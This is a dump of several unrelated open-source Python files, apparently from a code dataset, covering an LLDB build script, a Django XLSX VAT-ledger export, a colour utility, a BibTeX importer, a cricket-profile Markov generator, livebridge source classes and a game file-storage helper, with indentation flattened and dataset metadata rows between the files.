outputs additional information when running.
-m (optional) Specify called from Makefile system. If given locate
the LLDBWrapPython.cpp in --srcRoot/source folder
else in the --targetDir folder.
--srcRoot The root of the lldb source tree.
--targetDir Where the lldb framework/shared library gets put.
--cfgBlddir Where the buildSwigPythonLLDB.py program will
(optional) put the lldb.py file it generated from running
SWIG.
--prefix Is the root directory used to determine where
(optional) third-party modules for scripting languages should
be installed. Where non-Darwin systems want to put
the .py and .so files so that Python can find them
automatically. Python install directory.
--lldbLibDir The name of the directory containing liblldb.so.
(optional) "lib" by default.
Results: 0 Success
-100+ Error from this script to the caller script.
-100 Error program failure with optional message.
--------------------------------------------------------------------------
"""
def main(vDictArgs):
dbg = utilsDebug.CDebugFnVerbose("Python script main()")
bOk = True
strMsg = ""
strErrMsgProgFail = ""
bDbg = "-d" in vDictArgs
eOSType = utilsOsType.determine_os_type()
if bDbg:
pyVersion = sys.version_info
print((strMsgOsVersion % utilsOsType.EnumOsType.name_of(eOSType)))
print((strMsgPyVersion % (pyVersion[0], pyVersion[1])))
bOk, strFrameworkPythonDir, strMsg = get_framework_python_dir(vDictArgs)
strRoot = os.path.normpath(vDictArgs["--srcRoot"])
if bOk:
# lldb
listPkgFiles = [
os.path.join(
strRoot,
"source",
"Interpreter",
"embedded_interpreter.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "", listPkgFiles)
if bOk:
# lldb/formatters/cpp
listPkgFiles = [
os.path.join(
strRoot,
"examples",
"synthetic",
"gnu_libstdcpp.py"),
os.path.join(
strRoot,
"examples",
"synthetic",
"libcxx.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/formatters/cpp", listPkgFiles)
if bOk:
# Make an empty __init__.py in lldb/runtime as this is required for
# Python to recognize lldb.runtime as a valid package (and hence,
# lldb.runtime.objc as a valid contained package)
listPkgFiles = []
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/runtime", listPkgFiles)
if bOk:
# lldb/formatters
# Having these files copied here ensure that lldb/formatters is a
# valid package itself
listPkgFiles = [
os.path.join(
strRoot, "examples", "summaries", "cocoa", "cache.py"), os.path.join(
strRoot, "examples", "summaries", "synth.py"), os.path.join(
strRoot, "examples", "summaries", "cocoa", "metrics.py"), os.path.join(
strRoot, "examples", "summaries", "cocoa", "attrib_fromdict.py"), os.path.join(
strRoot, "examples", "summaries", "cocoa", "Logger.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/formatters", listPkgFiles)
if bOk:
# lldb/utils
listPkgFiles = [
os.path.join(
strRoot,
"examples",
"python",
"symbolication.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/utils", listPkgFiles)
if bOk and (eOSType == utilsOsType.EnumOsType.Darwin):
# lldb/macosx
listPkgFiles = [
os.path.join(
strRoot,
"examples",
"python",
"crashlog.py"),
os.path.join(
strRoot,
"examples",
"darwin",
"heap_find",
"heap.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/macosx", listPkgFiles)
if bOk and (eOSType == utilsOsType.EnumOsType.Darwin):
# lldb/diagnose
listPkgFiles = [
os.path.join(
strRoot,
"examples",
"python",
"diagnose_unwind.py"),
os.path.join(
strRoot,
"examples",
"python",
"diagnose_nsstring.py")]
bOk, strMsg = create_py_pkg(
vDictArgs, strFrameworkPythonDir, "/diagnose", listPkgFiles)
if bOk:
return (0, strMsg)
else:
strErrMsgProgFail += strMsg
return (-100, strErrMsgProgFail)
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# This script can be called by another Python script by calling the main()
# function directly
if __name__ == "__main__":
print("Script cannot be called directly, called by finishSwigWrapperClasses.py")
| apache-2.0 | 5,337,334,831,581,804,000 | 40.518072 | 99 | 0.558546 | false | 4.18712 | false | false | false |
pprofpc/generadorCalendario | xlsx.py | 1 | 7335 | # -*- coding: utf-8 -*-
#Para el excel
import xlsxwriter
try:
import cStringIO as StringIO
except ImportError:
import StringIO
#Descarga Libro iva
def printIva(request, idIva):
iva = RegistroIva.objects.get(id=idIva)
# Create the HttpResponse object with the appropriate PDF headers.
# create a workbook in memory
output = StringIO.StringIO()
workbook = xlsxwriter.Workbook(output)
arrayContenido = {
'border': 1,
'align': 'center',
'valign': 'vcenter'}
arrayMoney = {
'border': 1,
'align': 'rigth',
'valign': 'vcenter',
'num_format': '[$$-2C0A] #.#0'}
contenidoTabla = workbook.add_format(arrayContenido)
money = workbook.add_format(arrayMoney)
def addHoja(worksheet, tipoLibro):
negrita = workbook.add_format()
negrita.set_bold()
worksheet.set_column('A:C', 15)
worksheet.set_column('D:D', 40)
worksheet.set_column('E:S', 15)
worksheet.write('A1', 'IMPRESORA DEL CENTRO S.R.L.', negrita)
worksheet.write('A2', u'DOMICILIO: JULIO CESAR LASTRA 2220 - Bº SANTA ISABEL 1º SECCIÓN - CÓRDOBA', negrita)
worksheet.write('A3', 'CUIT: 30-71103466-4', negrita)
worksheet.write('A4', 'IVA RESPONSABLE INSCRIPTO', negrita)
worksheet.write('E4', 'IVA %s' % tipoLibro, negrita)
worksheet.write('E6', 'PERIODO: ', negrita)
worksheet.write('F6', '%s' % iva.periodo(), negrita)
##CREANDO TITULOS TABLA
tituloTabla = workbook.add_format({
'border': 2,
'align': 'center',
'valign': 'vcenter'})
worksheet.merge_range('A8:A9', 'FECHA', tituloTabla)
worksheet.merge_range('B8:C8', 'COMPROBANTE', tituloTabla)
worksheet.write('B9', 'TIPO',tituloTabla)
worksheet.write('C9', u'NÚMERO',tituloTabla)
worksheet.merge_range('D8:D9', u'NOMBRE Y APELLIDO O RAZÓN SOCIAL', tituloTabla)
worksheet.merge_range('E8:E9', u'C.U.I.T.', tituloTabla)
if tipoLibro == 'COMPRAS':
worksheet.merge_range('F8:F9', u'TOTAL\nFACTURADO', tituloTabla)
worksheet.merge_range('G8:J8', u'NETO GRAVADO', tituloTabla)
worksheet.write('G9', '21%',tituloTabla)
worksheet.write('H9', '27%',tituloTabla)
worksheet.write('I9', '17,355%',tituloTabla)
worksheet.write('J9', '10,50%',tituloTabla)
worksheet.merge_range('K8:N8', u'IVA LOQUIDADO', tituloTabla)
worksheet.write('K9', '21%',tituloTabla)
worksheet.write('L9', '27%',tituloTabla)
worksheet.write('M9', '17,355%',tituloTabla)
worksheet.write('N9', '10,50%',tituloTabla)
worksheet.merge_range('O8:O9', u'COMPRAS\nFACT. C/B', tituloTabla)
worksheet.merge_range('P8:P9', u'CONCEPTO\nNO GRAV.', tituloTabla)
worksheet.merge_range('Q8:Q9', u'RETENCIÓN\nIVA', tituloTabla)
worksheet.merge_range('R8:R9', u'RETENCIÓN\nGANANCIAS', tituloTabla)
worksheet.merge_range('S8:S9', u'IMP. CTA', tituloTabla)
else:
worksheet.merge_range('F8:F9', u'COND', tituloTabla)
worksheet.merge_range('G8:G9', u'TOTAL\nFACTURA', tituloTabla)
worksheet.merge_range('H8:I8', u'NETO GRAVADO', tituloTabla)
worksheet.write('H9', '21%',tituloTabla)
worksheet.write('I9', '10,5%',tituloTabla)
worksheet.merge_range('J8:K8', u'IVA LIQUIDADO', tituloTabla)
worksheet.write('J9', '21%',tituloTabla)
worksheet.write('K9', '10,5%',tituloTabla)
worksheet.merge_range('L8:L9', u'EXENTOS', tituloTabla)
worksheet.merge_range('M8:M9', u'RETEN.', tituloTabla)
return worksheet
#CARGO LIBRO COMPRAS
compras = addHoja(workbook.add_worksheet('LIBRO IVA COMPRAS'), 'COMPRAS')
count = 10
for fc in iva.facturasCompra():
compras.write('A%d' % count, str(fc.fecha.strftime('%d/%m/%Y')),contenidoTabla)
compras.write('B%d' % count, str(fc.letra),contenidoTabla)
compras.write('C%d' % count, str(fc.numero),contenidoTabla)
compras.write('D%d' % count, str(fc.proveedor.nombre),contenidoTabla)
compras.write('E%d' % count, str(fc.proveedor.cuit),contenidoTabla)
compras.write('F%d' % count, fc.total(),money)
if (fc.iva=='21'):
compras.write('G%d' % count, fc.subtotal(),money)
else:
compras.write('G%d' % count, '',contenidoTabla)
if (fc.iva=='27'):
compras.write('H%d' % count, fc.subtotal(),money)
else:
compras.write('H%d' % count, '',contenidoTabla)
if (fc.iva=='17.355'):
compras.write('I%d' % count, fc.subtotal(),money)
else:
compras.write('I%d' % count, '',contenidoTabla)
if (fc.iva=='10.5'):
compras.write('J%d' % count, fc.subtotal(),money)
else:
compras.write('J%d' % count, '',contenidoTabla)
if (fc.iva=='21' and fc.letra=='A'):
compras.write('K%d' % count, fc.subtotal(),money)
else:
compras.write('K%d' % count, '',contenidoTabla)
if (fc.iva=='27' and fc.letra=='A'):
compras.write('L%d' % count, fc.subtotal(),money)
else:
compras.write('L%d' % count, '',contenidoTabla)
if (fc.iva=='17.355' and fc.letra=='A'):
compras.write('M%d' % count, fc.subtotal(),money)
else:
compras.write('M%d' % count, '',contenidoTabla)
if (fc.iva=='10.5' and fc.letra=='A'):
compras.write('N%d' % count, fc.subtotal(),money)
else:
compras.write('N%d' % count, '',contenidoTabla)
if (fc.letra=='B' or fc.letra=='C'):
compras.write('O%d' % count, fc.total(),money)
else:
compras.write('O%d' % count, '',contenidoTabla)
if (fc.noGravado>0):
compras.write('P%d' % count, fc.noGravado,money)
else:
compras.write('P%d' % count, '',contenidoTabla)
if (fc.retIva>0):
compras.write('Q%d' % count, fc.retIva,money)
else:
compras.write('Q%d' % count, '',contenidoTabla)
if (fc.retGanancias>0):
compras.write('R%d' % count, fc.retGanancias,money)
else:
compras.write('R%d' % count, '',contenidoTabla)
if (fc.retImpCta>0):
compras.write('S%d' % count, fc.retImpCta,money)
else:
compras.write('S%d' % count, '',contenidoTabla)
count = count + 1
#CARGO LIBRO VENTAS
ventas = addHoja(workbook.add_worksheet('LIBRO IVA VENTAS'), 'VENTAS')
factVentas = iva.facturasVenta()
workbook.close()
#Creando El response
output.seek(0)
response = HttpResponse(output.read(), mimetype="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet")
response['Content-Disposition'] = "attachment; filename=RegistroIva%s.xlsx" % (iva.periodo())
print response
return response
| gpl-2.0 | -4,199,780,018,633,320,400 | 40.630682 | 120 | 0.564215 | false | 2.960404 | false | false | false |
DistrictDataLabs/yellowbrick | yellowbrick/style/utils.py | 1 | 2199 | # yellowbrick.style.utils
# Utility functions for styles
#
# Author: Neal Humphrey
# Created: Wed Mar 22 12:39:35 2017 -0400
#
# Copyright (C) 2017 The scikit-yb developers
# For license information, see LICENSE.txt
#
# ID: utils.py [45268fc] [email protected] $
"""
Utility functions for styles
"""
##########################################################################
## Imports
##########################################################################
import numpy as np
def find_text_color(base_color, dark_color="black", light_color="white", coef_choice=0):
"""
Takes a background color and returns the appropriate light or dark text color.
Users can specify the dark and light text color, or accept the defaults of 'black' and 'white'
base_color: The color of the background. This must be
specified in RGBA with values between 0 and 1 (note, this is the default
return value format of a call to base_color = cmap(number) to get the
color corresponding to a desired number). Note, the value of `A` in RGBA
is not considered in determining light/dark.
dark_color: Any valid matplotlib color value.
Function will return this value if the text should be colored dark
light_color: Any valid matplotlib color value.
Function will return this value if thet text should be colored light.
coef_choice: slightly different approaches to calculating brightness. Currently two options in
a list, user can enter 0 or 1 as list index. 0 is default.
"""
# Coefficients:
# option 0: http://www.nbdtech.com/Blog/archive/2008/04/27/Calculating-the-Perceived-Brightness-of-a-Color.aspx
# option 1: http://stackoverflow.com/questions/596216/formula-to-determine-brightness-of-rgb-color
coef_options = [
np.array((0.241, 0.691, 0.068, 0)),
np.array((0.299, 0.587, 0.114, 0)),
]
coefs = coef_options[coef_choice]
rgb = np.array(base_color) * 255
brightness = np.sqrt(np.dot(coefs, rgb ** 2))
# Threshold from option 0 link; determined by trial and error.
# base is light
if brightness > 130:
return dark_color
return light_color
| apache-2.0 | 9,137,326,317,813,900,000 | 35.65 | 115 | 0.644384 | false | 3.919786 | false | false | false |
mediatum/mediatum | schema/bibtex.py | 1 | 15854 | # coding=utf8
"""
mediatum - a multimedia content repository
Copyright (C) 2008 Matthias Kramm <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
""" We want to parse even badly broken bibtex files, no longer adhering to
the "official" bibtex grammar. In particular, we need to handle
curly brace misleveling, missing quotation marks, missing attributes,
missing ids, etc.
Hence, we don't use a lex+yacc approach but rather a heuristic approach,
which extracts records from the source file only by looking into
"@doctype" records and "field = " fields, ignoring all in between (and
not dealing with curly braces at all)
"""
import re
import os
import shutil
import sys
import codecs
import logging
import unicodedata
import time
from bibtexparser import load as bibtex_load
from bibtexparser.bparser import BibTexParser
import bibtexparser.customization
from core import db, Node
from .schema import Metadatatype
import core.users as users
from contenttypes import Directory
from contenttypes.document import Document
from utils.utils import u, u2, utf8_decode_escape
from utils.date import parse_date
q = db.query
logg = logging.getLogger(__name__)
ESCAPE_BIBTEX_KEY = False
def normchar(char_descriptor):
return unicodedata.lookup(char_descriptor).lower()
din5007_variant2_translation = [
[normchar('LATIN CAPITAL LETTER A WITH DIAERESIS'), 'ae'], # Auml
[normchar('LATIN CAPITAL LETTER O WITH DIAERESIS'), 'oe'], # Ouml
[normchar('LATIN CAPITAL LETTER U WITH DIAERESIS'), 'ue'], # Uuml
[normchar('LATIN SMALL LETTER A WITH DIAERESIS'), 'ae'], # auml
[normchar('LATIN SMALL LETTER O WITH DIAERESIS'), 'oe'], # ouml
[normchar('LATIN SMALL LETTER U WITH DIAERESIS'), 'ue'], # uuml
[normchar('LATIN SMALL LETTER SHARP S'), 'ss'], # szlig
[normchar('LATIN SMALL LETTER E WITH GRAVE'), 'e'], # egrave
[normchar('LATIN SMALL LETTER E WITH ACUTE'), 'e'], # eacute
]
d_escape = dict(din5007_variant2_translation)
def escape_bibtexkey(s, default_char="_"):
import string
res = ""
for c in s:
if c in string.ascii_letters + string.digits + "-_+:":
res = res + c
continue
elif c in d_escape:
res = res + d_escape[c]
else:
res = res + default_char
return res
token = re.compile(r'@\w+\s*{\s*|[a-zA-Z-_]+\s*=\s*{?["\'{]|[a-zA-Z-]+\s*=\s+[0-9a-zA-Z_]')
comment = re.compile(r'%[^\n]*\n')
delim = re.compile(r'\W')
delim2 = re.compile(r'^(?u)\s*[\w+_\-\:]*\s*\,')
frontgarbage = re.compile(r'^\W*', re.UNICODE)
backgarbage = re.compile(r'[ \n\t}"\',]*$')
xspace = re.compile(r'\s+')
counterpiece = {"{": "}", '"': '"', "'": "'"}
class MissingMapping(Exception):
def __init__(self, message=""):
self.message = message
def __str__(self):
return self.message
def getNow():
import datetime
now = datetime.datetime.now().isoformat()
now = now.replace('T', '_').replace(':', '-')
now = now.split('.')[0]
return now
def save_import_file(filename):
import core.config as config
temppath = config.get("paths.tempdir")
_filename_only = filename.split(os.path.sep)[-1]
# leave following in for windows: "/" in path representation possible there
_filename_only = filename.split("/")[-1]
destname = os.path.join(temppath, "bibtex_import_saved_" + getNow() + "_" + _filename_only)
logg.info("bibtex import: going to copy/save import file %s -> %s", filename, destname)
shutil.copyfile(filename, destname)
return
article_types = [
("article", "An article from a journal or magazine.",
("author", "title", "journal", "year"),
("volume", "number", "pages", "month", "note", "key")),
("misc", "Use this type when nothing else seems appropriate.",
(),
("author", "title", "howpublished", "month", "year", "note", "key")),
("unpublished", "A document with an author and title, but not formally published. ",
("author", "title", "note"),
("month", "year", "key")),
("book", "A book with an explicit publisher. ",
("author or editor", "title", "publisher", "year"),
("volume", "series", "address", "edition", "month", "note", "key")),
("booklet", "A work that is printed and bound, but without a named publisher or sponsoring institution.",
("title",),
("author", "howpublished", "address", "month", "year", "note", "key")),
("inbook", "A part of a book, which may be a chapter and/or a range of pages. ",
("author or editor", "title", "chapter and/or pages", "publisher", "year"),
("volume", "series", "address", "edition", "month", "note", "key")),
("manual", "Technical documentation. ",
("title"),
("author", "organization", "address", "edition", "month", "year", "note", "key")),
("techreport", "A report published by a school or other institution, usually numbered within a series. ",
("author", "title", "institution", "year"),
("type", "number", "address", "month", "note", "key")),
("conference",
"An article in the proceedings of a conference. This entry is identical to the 'inproceedings' entry and is included for compatibility with another text formatting system. ",
("author", "title", "booktitle", "year"),
("editor", "pages", "organization", "publisher", "address", "month", "note", "key")),
("proceedings", " The proceedings of a conference.",
("title", "year"),
("editor", "publisher", "organization", "address", "month", "note", "key")),
("inproceedings", "An article in the proceedings of a conference. ",
("author", "title", "booktitle", "year"),
("editor", "pages", "organization", "publisher", "address", "month", "note", "key")),
("incollection", "A part of a book with its own title.",
("author", "title", "booktitle", "year"),
("editor", "pages", "organization", "publisher", "address", "month", "note", "key")),
("phdthesis", "A PhD thesis.",
("author", "title", "school", "year"),
("address", "month", "note", "key")),
("mastersthesis", "A Master's thesis.",
("author", "title", "school", "year"),
("address", "month", "note", "key"))]
from . import schema as schema
def getAllBibTeXTypes():
return [bibname for bibname, description, required, optional in article_types]
def getbibtexmappings():
bibtextypes = {}
for metatype in schema.loadTypesFromDB():
for bibtextype in metatype.get("bibtexmapping").split(";"):
if bibtextype:
metatype_name = metatype.getName()
bibtextypes[bibtextype] = bibtextypes.get(bibtextype, []) + [metatype_name]
for bibtextype in bibtextypes:
if len(bibtextypes[bibtextype]) == 1:
bibtextypes[bibtextype] = bibtextypes[bibtextype][-1]
elif len(bibtextypes[bibtextype]) > 1:
logg.error("bibtex import: ambiguous mapping for bibtex type '%s': %s - choosing last one",
bibtextype, bibtextypes[bibtextype])
bibtextypes[bibtextype] = bibtextypes[bibtextype][-1]
return bibtextypes
def checkMappings():
s = getbibtexmappings()
for bibname, description, required, optional in article_types:
if bibname not in s:
print bibname, "is not associated with any metatype"
else:
print bibname, "->", s[bibname]
def detecttype(doctype, fields):
results = []
for bibname, description, required, optional in article_types:
score = 0
if doctype.lower() == bibname.lower():
score += 120
score -= len(required)
for field in required:
if field in fields:
score += 20
for field in optional:
if field in fields:
score += 10
results += [(score, bibname)]
if not results:
# no mapping types defined
raise ValueError("no bibtex mappings defined")
score, bibname = max(results)
if score >= 30:
return bibname
else:
return None
def _bibteximport_customize(record):
"""
Sanitize bibtex records (unicode, name lists).
"""
record = bibtexparser.customization.convert_to_unicode(record)
record = bibtexparser.customization.author(record)
record = bibtexparser.customization.editor(record)
# editor function adds "ids" (s.th. like hashes), we don't need them
if record.get("editor"):
record["editor"] = list(v["name"] for v in record["editor"])
# convert author/editor lists into semicolon-separated strings
for key in ("author", "editor"):
if key in record:
record[key] = ";".join(", ".join(n for n in name.split(", ") if n.strip()) for name in record[key])
for key in ("title", "booktitle"):
if key in record:
record[key] = record[key].replace('\n', ' ')
return record
def getentries(filename):
try:
save_import_file(filename)
except IOError as e:
logg.error("bibtex import: save import file failed: {}".format(e))
raise IOError("save import file failed")
# use utf-8-sig instead of utf-8 to get rid of BOM_UTF8, which confuses bibtex parser
for encoding in ('utf-8-sig', 'utf-16', None):
try:
error = None
fi = codecs.open(filename, "r", encoding=encoding)
parser = BibTexParser(common_strings=True)
# accept also non standard records like @SCIENCEREPORT
parser.ignore_nonstandard_types = False
parser.customization = _bibteximport_customize
bibtex = bibtex_load(fi, parser=parser)
# seems to be the correct encoding, don't try other encodings
break
except Exception as e:
# check if there is a utf-encoding error, then try other encoding
if (encoding is 'utf-8-sig' and str(e).lower().find('utf8') >= 0) or \
(encoding is 'utf-16' and str(e).lower().find('utf-16') >= 0):
continue
error = e
break
if error:
logg.error("bibtex import: bibtexparser failed: {}".format(e))
raise ValueError("bibtexparser failed")
return bibtex.entries
def importBibTeX(infile, node=None, req=None):
user = None
if req:
try:
user = users.getUserFromRequest(req)
msg = "bibtex import: import started by user '%s'" % (user.name)
except:
msg = "bibtex import: starting import (unable to identify user)"
else:
msg = "bibtex import: starting import (%s)" % ustr(sys.argv)
logg.info(msg)
bibtextypes = getbibtexmappings()
result = []
entries = []
if isinstance(infile, list):
entries = infile
else:
node = node or Directory(utf8_decode_escape(os.path.basename(infile)))
try:
entries = getentries(infile)
except:
# XXX TODO This reports *everything* as encoding error
# XXX TODO (even things like full disk or other parsing errors).
# XXX TODO We should at least reformulate the error message,
# XXX TODO and -- even better -- only catch errors that are to be expected.
logg.error("getentries failed", exc_info=1)
msg = "bibtex import: getentries failed, import stopped (encoding error)"
logg.error(msg)
raise ValueError("bibtex_unspecified_error")
logg.info("bibtex import: %d entries", len(entries))
for count, fields in enumerate(entries):
docid_utf8 = fields["ID"]
fields[u"key"] = fields.pop("ID")
doctype = fields.pop("ENTRYTYPE")
mytype = detecttype(doctype, fields)
if mytype:
fieldnames = {}
datefields = {}
if mytype not in bibtextypes:
logg.error("bibtex mapping of bibtex type '%s' not defined - import stopped", mytype)
msg = "bibtex mapping of bibtex type '%s' not defined - import stopped" % mytype
raise MissingMapping(msg)
result += [(mytype.lower(), fields)]
metatype = bibtextypes[mytype]
# check for mask configuration
metadatatype = q(Metadatatype).filter_by(name=metatype).one()
mask = metadatatype.get_mask(u"bibtex_import") or metadatatype.get_mask(u"bibtex")
if mask:
for f in mask.all_maskitems:
try:
_bib_name = q(Node).get(f.get(u"mappingfield")).name
_mfield = q(Node).get(f.get(u"attribute"))
_med_name = _mfield.name
if _mfield.get(u"type") == u"date":
datefields[_med_name] = _mfield.get(u"valuelist")
except AttributeError as e:
msg = "bibtex import docid='{}': field error for bibtex mask for type {} and bibtex-type '{}': {}"
msg = msg.format(docid_utf8, metatype, mytype, e)
logg.error(msg)
else:
fieldnames[_bib_name] = _med_name
doc = Document(docid_utf8,schema=metatype)
for k, v in fields.items():
if k in fieldnames.keys():
k = fieldnames[k] # map bibtex name
if k in datefields.keys(): # format date field
try:
v = str(parse_date(v, datefields[k]))
# if date format does not contains '%' the valid digit of the result must not be longer than the date format
# e.g. if datefields[k] is 'yyyy' then the result v must be clipped after 4 characters
# afterwards the result is expanded again (without the invalid digits)
if datefields[k].find('%') < 0:
v = v[:len(datefields[k])]
v = str(parse_date(v, datefields[k]))
except ValueError as e:
logg.exception("bibtex exception: %s: %s", k, v)
raise ValueError("bibtex_date_error")
doc.set(k, v)
# because the bibtex import contains only a subset of the metadata defined in metadatatype,
# all other metadata are created and set to default values.
# this will be done in the same manner as if the document is loaded in editor and saved without
# any changes (required fields are not considered)
editmask = metadatatype.get_mask(u"editmask")
if editmask and hasattr(editmask, 'set_default_metadata'):
editmask.set_default_metadata(doc)
try:
node.children.append(doc)
if user:
doc.set("creator", user.login_name)
doc.set("creationtime", unicode(time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(time.time()))))
except Exception as e:
logg.exception("bibtex exception")
raise ValueError()
logg.debug("bibtex import: finished import")
print msg
return node
| gpl-3.0 | 7,457,262,981,495,890,000 | 38.242574 | 179 | 0.599218 | false | 3.879129 | false | false | false |
sujaymansingh/random_cricket_profiles | random_cricket_profiles/player_generator.py | 1 | 3275 | """Generates a player profile using markov chains!
"""
import random
import sujmarkov
from random_cricket_profiles import countries, players
class PlayerGenerator():
def __init__(self, sample_players, min_profile_length):
self.min_profile_length = min_profile_length
self.profile_markov = sujmarkov.Markov(n=3)
self.surname_markovs = {}
self.firstname_markovs = {}
for country in countries.COUNTRIES:
self.surname_markovs[country.country_id] = sujmarkov.Markov(n=4)
self.firstname_markovs[country.country_id] = sujmarkov.Markov(n=4)
for player in sample_players:
self.add_player(player)
def add_player(self, player):
for line in player.profile:
if line:
sentence = line.split(" ")
self.profile_markov.add(sentence)
country_id = player.country_id
self.surname_markovs[country_id].add(player.surname)
firstnames = player.firstnames
if firstnames:
for name in firstnames.split(" "):
if name:
self.firstname_markovs[country_id].add(name)
def generate(self, country_code=None, seed=None):
"""Returns a tuple (player, seed).
If country_code is not passed, a random one is chosed.
seed is used to seed the random number generator.
This means that the same seed will always generate the same player.
"""
if seed is None:
seed = random.getrandbits(64)
random_ = random.Random(seed)
if country_code:
country = countries.get_country_by_code(country_code)
else:
country = random_.choice(countries.COUNTRIES)
surname_markov = self.surname_markovs[country.country_id]
surname = "".join(surname_markov.generate(random_=random_))
firstname_markov = self.firstname_markovs[country.country_id]
firstnames_as_list = []
for i in range(random_.choice([1, 2, 3])):
firstname = "".join(firstname_markov.generate(random_=random_))
firstnames_as_list.append(firstname)
firstnames = " ".join(firstnames_as_list)
profile = []
while get_total_length(profile) < self.min_profile_length:
line = " ".join(self.profile_markov.generate(random_=random_))
for item in [
("$fullname", surname),
("$known_as", surname),
("$surname", surname),
("$firstnames", firstnames),
("$team", country.name),
]:
placeholder, value = item
line = line.replace(placeholder, value)
profile.append(line)
player = players.Player(
country_id=country.country_id,
firstnames=firstnames,
surname=surname,
profile=profile,
fullname=firstnames + " " + surname,
known_as=""
)
return (player, seed)
def get_total_length(profile):
"""Return the sum of lengths of each string in this list.
>>> get_total_length(["This is a conversation", "Yes"])
25
"""
lengths = [len(line) for line in profile]
return sum(lengths)
| mit | 8,664,843,146,164,601,000 | 32.080808 | 78 | 0.584427 | false | 4.02829 | false | false | false |
dpa-newslab/livebridge | livebridge/base/sources.py | 1 | 4313 | # -*- coding: utf-8 -*-
#
# Copyright 2016 dpa-infocom GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from livebridge.components import get_db_client
logger = logging.getLogger(__name__)
class BaseSource(object):
"""Base class for sources."""
__module__ = "livebridge.base"
type = ""
mode = ""
def __init__(self, *, config={}, **kwargs):
"""Base constructor for sources.
:param config: Configuration passed from the control file.
"""
pass
@property
def _db(self):
"""Database client for accessing storage.
:returns: :class:`livebridge.storages.base.BaseStorage` """
if not hasattr(self, "_db_client") or getattr(self, "_db_client") is None:
self._db_client = get_db_client()
return self._db_client
async def filter_new_posts(self, source_id, post_ids):
"""Filters ist of post_id for new ones.
:param source_id: id of the source
:type string:
:param post_ids: list of post ids
:type list:
:returns: list of unknown post ids."""
new_ids = []
try:
db_client = self._db
posts_in_db = await db_client.get_known_posts(source_id, post_ids)
new_ids = [p for p in post_ids if p not in posts_in_db]
except Exception as exc:
logger.error("Error when filtering for new posts {} {}".format(source_id, post_ids))
logger.exception(exc)
return new_ids
async def get_last_updated(self, source_id):
"""Returns latest update-timestamp from storage for source.
:param source_id: id of the source (source_id, ticker_id, blog_id pp)
:type string:
:returns: :py:class:`datetime.datetime` object of latest update datetime in db."""
last_updated = await self._db.get_last_updated(source_id)
logger.info("LAST UPDATED: {} {}".format(last_updated, self))
return last_updated
class PollingSource(BaseSource):
"""Base class for sources which are getting polled. Any custom adapter source, which \
should get polled, has to be inherited from this base class."""
mode = "polling"
async def poll(self):
"""Method has to be implemented by the concrete inherited source class.
:func:`poll` gets called by the interval defined by environment var *POLLING_INTERVALL*.
The inheriting class has to implement the actual poll request for the source in this method.
:return: list of new posts"""
raise NotImplementedError("Method 'poll' not implemented.")
async def stop(self):
"""Method can be implemented by the concrete inherited source class.
By implementing this method, the source class is able to handle the shutdown event explicitly."""
pass
class StreamingSource(BaseSource):
"""Base class for streaming sources. Any custom adapter source, which is using a websocket, SSE or\
any other stream as source has to be inherited from this base class."""
mode = "streaming"
async def listen(self, callback):
"""Method has to be implemented by the concrete inherited source class.
A websocket connection has to be opened and given *callback* method has to be
called with the new post as argument.
:param callback: Callback method which has to be called with list of new posts.
:return: True"""
raise NotImplementedError("Method 'listen' not implemented.")
async def stop(self):
"""Method has to be implemented by the concrete inherited source class.
By calling this method, the websocket-connection has to be stopped.
:return: True"""
raise NotImplementedError("Method 'stop' not implemented.")
| apache-2.0 | 8,024,353,077,062,878,000 | 35.243697 | 108 | 0.657083 | false | 4.334673 | false | false | false |
isharacomix/rules-of-war | code/core/storage.py | 1 | 2639 | # The storage module is a platform-independent way of saving and loading
# files to certain locations. This module is global and functional. It contains
# NO state information.
#
# There are two data stores. The local data stored in the user's home directory
# and the global data stored in /data/ in the game's runtime location. The data
# directory must be two sublevels above this file. Information should never
# be saved in data... only in home.
import os
GAME_DIR = ".rules-of-war"
# This reads the text from a file in the home directory. Each arg is a
# folder in the filename, and will be joined as appropriate. Returns None if
# the file does not exist.
def read(*args):
home = os.path.join(os.path.expanduser("~"),GAME_DIR)
target = os.path.join(home, *args)
if not os.path.exists(target):
return None
try:
f = open(target,"r")
s = f.read()
f.close()
return s
except:
return None
# This returns a list of filenames under the provided directory.
def list_files(*args):
home = os.path.join(os.path.expanduser("~"),GAME_DIR)
target = os.path.join(home, *args)
if not os.path.exists(target):
return []
return [ f for f in os.listdir(target)
if os.path.isfile(os.path.join(target,f)) ]
# This saves a file to the home directory, overwriting if appropriate.
# Returns False if something goes wrong.
def save(data, *args):
home = os.path.join(os.path.expanduser("~"),GAME_DIR)
targetdir = os.path.join(home, *(args[:-1]))
target = os.path.join(home, *args)
if not os.path.exists(targetdir):
os.makedirs(targetdir)
try:
f = open(target,"w")
f.write(data)
f.close()
return True
except:
return False
# This reads a file from the provided data directory.
def read_data(*args):
data = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"..","..","data")
target = os.path.join(data, *args)
if not os.path.exists(target):
return None
try:
f = open(target,"r")
s = f.read()
f.close()
return s
except:
return None
# This returns a list of filenames under the provided data directory. These
# files should be considered READ ONLY.
def list_datafiles(*args):
